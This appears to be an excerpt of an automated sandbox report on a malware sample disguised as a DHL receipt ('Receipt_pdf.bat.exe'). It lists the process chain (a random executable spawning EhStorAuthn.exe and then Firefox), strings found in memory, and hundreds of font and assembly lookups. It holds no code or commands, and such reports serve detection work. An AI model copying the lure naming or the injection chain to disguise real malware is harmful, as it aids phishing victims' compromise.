                Source: C:\Program Files (x86)\OhJZRdjqcfdLbqjSIBHtmFsIoXuMWTRgTYMJBZhMMrN\CLaoxM16clnn.exe Process created: C:\Windows\SysWOW64\EhStorAuthn.exe "C:\Windows\SysWOW64\EhStorAuthn.exe"
                Source: C:\Windows\SysWOW64\EhStorAuthn.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: CLaoxM16clnn.exe, 00000012.00000000.1923114146.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000012.00000002.4207700151.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208067481.0000000001280000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: CLaoxM16clnn.exe, 00000012.00000000.1923114146.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000012.00000002.4207700151.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208067481.0000000001280000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: CLaoxM16clnn.exe, 00000012.00000000.1923114146.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000012.00000002.4207700151.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208067481.0000000001280000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: CLaoxM16clnn.exe, 00000012.00000000.1923114146.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000012.00000002.4207700151.0000000001A50000.00000002.00000001.00040000.00000000.sdmp, CLaoxM16clnn.exe, 00000015.00000002.4208067481.0000000001280000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Queries volume information: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe VolumeInformation
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe | Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
